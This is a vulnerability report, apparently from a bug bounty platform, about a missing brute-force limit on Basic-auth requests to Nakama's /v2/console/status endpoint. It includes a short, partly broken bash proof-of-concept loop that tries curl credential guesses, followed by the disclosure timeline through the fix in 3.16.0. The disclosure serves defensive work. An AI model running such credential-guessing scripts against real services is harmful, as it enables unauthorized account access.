Login bruteforce in heroiclabs/nakama


Reported on

Aug 24th 2022


According to the fix of the previous report, the login page has a rate limit mechanism to block the user’s IP when many attempts are made. The endpoint, for example, /v2/console/status only returns the content when who made the request has the correct rights. However, this request is not being handled against brute-force attacks.

Proof of Concept

The attacker can use Authorization: Basic, represented by a base64 string containing <user>:<password>. So the attacker only needs to send <user>:<password> via the HTTP header Authorization, and check the HTTP response code (200).




request() {
  res=$(curl -i -s -k "http://$HOST:$PORT/v2/console/status" \
    -H "Authorization: Basic $token" | head -n1 | grep 200)

  if [[ $res != '' ]]; then
    echo ">>> Found: $(echo $token | base64 -d)"
    echo "Wrong: $(echo $token | base64 -d)"

# 1000 wrong tries
for i in {1..1000}; do
  request $(echo -n "user:password$i" | base64)

request $(echo -n "$USER:$PASSWORD" | base64)


Login bruteforce attacks.

We are processing your report and will contact the heroiclabs/nakama team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists a year ago
We have contacted a member of the heroiclabs/nakama team and are waiting to hear back a year ago
heroiclabs/nakama maintainer has acknowledged this report a year ago
Renan Rocha
a year ago



Andrei Mihu validated this vulnerability 10 months ago
Renan Rocha has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Andrei Mihu marked this as fixed in 3.16.0 with commit d1e894 10 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
This vulnerability is scheduled to go public on Feb 1st 2023
api.go#L299-L421 has been validated
Andrei Mihu published this vulnerability 10 months ago
to join this conversation